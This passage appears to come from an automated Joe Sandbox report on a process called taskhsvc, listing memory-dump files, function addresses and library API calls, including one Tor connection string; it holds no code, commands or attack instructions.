    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0032888C, Relevance: 6.1, APIs: 4, Instructions: 58
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002B314C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 002B4037: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0026B8B5), ref: 002B408C
      • Part of subcall function 002B4093: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0026B89E), ref: 002B40C7
      • Part of subcall function 002B3B52: __stack_chk_fail.LIBSSP-0 ref: 002B3C6E
      • Part of subcall function 002B2F9B: __stack_chk_fail.LIBSSP-0 ref: 002B301C
      • Part of subcall function 002B3F06: abort.MSVCRT ref: 002B3F62
      • Part of subcall function 002B3F06: __stack_chk_fail.LIBSSP-0 ref: 002B3F72
      • Part of subcall function 002B6848: __stack_chk_fail.LIBSSP-0 ref: 002B68D1
      • Part of subcall function 002B0D2C: __stack_chk_fail.LIBSSP-0 ref: 002B0D7F
    • abort.MSVCRT ref: 002B32EC
      • Part of subcall function 002B0D86: __stack_chk_fail.LIBSSP-0 ref: 002B0E09
      • Part of subcall function 002B3023: abort.MSVCRT ref: 002B308D
      • Part of subcall function 002B3023: time.MSVCRT ref: 002B30F0
      • Part of subcall function 002B3023: __stack_chk_fail.LIBSSP-0 ref: 002B3141
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 002C1E90: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00238007), ref: 002C1EC8
      • Part of subcall function 002B4177: __stack_chk_fail.LIBSSP-0 ref: 002B4248
      • Part of subcall function 002B354C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002B3295), ref: 002B362A
    • __stack_chk_fail.LIBSSP-0 ref: 002B33E1
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001DBED0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143
    APIs
      • Part of subcall function 001DBA88: __stack_chk_fail.LIBSSP-0 ref: 001DBACF
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 003014B0: abort.MSVCRT(?,?,?,?,?,?,001DC022), ref: 0030151B
      • Part of subcall function 003014B0: abort.MSVCRT(?,?,?,?,?,?,001DC022), ref: 0030155A
      • Part of subcall function 003014B0: abort.MSVCRT(?,?,?,?,?,?,001DC022), ref: 003015B8
      • Part of subcall function 003014B0: abort.MSVCRT(?,?,?,?,?,?,001DC022), ref: 003015FC
      • Part of subcall function 003014B0: __stack_chk_fail.LIBSSP-0 ref: 003016DF
      • Part of subcall function 0030102B: abort.MSVCRT ref: 0030108F
      • Part of subcall function 0030102B: abort.MSVCRT ref: 003010CE
      • Part of subcall function 0030102B: abort.MSVCRT ref: 00301122
      • Part of subcall function 0030102B: __stack_chk_fail.LIBSSP-0 ref: 00301237
    • __stack_chk_fail.LIBSSP-0 ref: 001DC0CE
      • Part of subcall function 001DB8B3: abort.MSVCRT ref: 001DB992
      • Part of subcall function 001DB8B3: __stack_chk_fail.LIBSSP-0 ref: 001DBA81
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 002BA2D6: __stack_chk_fail.LIBSSP-0 ref: 002BA3B6
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00214904, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
    APIs
      • Part of subcall function 002148AA: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002149AA), ref: 002148FD
    • __stack_chk_fail.LIBSSP-0 ref: 00214B2B
      • Part of subcall function 001DCFB4: __stack_chk_fail.LIBSSP-0 ref: 001DCFE5
      • Part of subcall function 0027701D: time.MSVCRT ref: 0027703A
      • Part of subcall function 0027701D: abort.MSVCRT ref: 0027707C
      • Part of subcall function 0027701D: __stack_chk_fail.LIBSSP-0 ref: 00277096
      • Part of subcall function 001DEAC4: abort.MSVCRT ref: 001DEB1D
      • Part of subcall function 001DEAC4: abort.MSVCRT ref: 001DEB5C
      • Part of subcall function 001DEAC4: __stack_chk_fail.LIBSSP-0 ref: 001DF151
      • Part of subcall function 00211254: free.MSVCRT ref: 0021127E
      • Part of subcall function 00211254: __stack_chk_fail.LIBSSP-0 ref: 00211296
      • Part of subcall function 0020FEEE: __stack_chk_fail.LIBSSP-0 ref: 0020FF21
      • Part of subcall function 0021002B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00214A74), ref: 0021006B
      • Part of subcall function 003040B6: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,0027CC2C,?,?,?,?,?,?,?,?,?,002C3756), ref: 003040D6
      • Part of subcall function 003064D9: __stack_chk_fail.LIBSSP-0 ref: 0030658E
      • Part of subcall function 001F1535: __stack_chk_fail.LIBSSP-0 ref: 001F157E
      • Part of subcall function 00210FB7: memcpy.MSVCRT ref: 00211052
      • Part of subcall function 00210FB7: __stack_chk_fail.LIBSSP-0 ref: 00211063
      • Part of subcall function 001DE7A7: abort.MSVCRT ref: 001DE800
      • Part of subcall function 001DE7A7: abort.MSVCRT ref: 001DE83F
      • Part of subcall function 001DE7A7: __stack_chk_fail.LIBSSP-0 ref: 001DEAB7
      • Part of subcall function 00342356: abort.MSVCRT ref: 003423A6
      • Part of subcall function 00342356: SSL_pending.SSLEAY32 ref: 003423B4
      • Part of subcall function 00342356: __stack_chk_fail.LIBSSP-0 ref: 003423C4
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00208ADA, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116
    APIs
      • Part of subcall function 002088CD: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00208E8D), ref: 00208AD3
      • Part of subcall function 00313207: __stack_chk_fail.LIBSSP-0 ref: 00313277
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
      • Part of subcall function 0020807A: __stack_chk_fail.LIBSSP-0 ref: 002080F9
    • __stack_chk_fail.LIBSSP-0 ref: 00208D09
    Strings
    • U, xrefs: 00208B32
    • NOTICE BOOTSTRAP PROGRESS=80 TAG=conn_or SUMMARY="Connecting to the Tor network", xrefs: 00208C64
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E471C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106
    APIs
      • Part of subcall function 003425CA: ERR_peek_error.LIBEAY32 ref: 003425E6
      • Part of subcall function 003425CA: __stack_chk_fail.LIBSSP-0 ref: 0034265D
    • abort.MSVCRT ref: 001E4857
      • Part of subcall function 001E331A: __stack_chk_fail.LIBSSP-0 ref: 001E335F
      • Part of subcall function 001E4071: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E4145
      • Part of subcall function 001E4071: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E419E
      • Part of subcall function 001E4071: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5072), ref: 001E41C6
      • Part of subcall function 001E444E: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E4806), ref: 001E44BA
      • Part of subcall function 001E444E: __stack_chk_fail.LIBSSP-0 ref: 001E4520
    • __stack_chk_fail.LIBSSP-0 ref: 001E4887
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
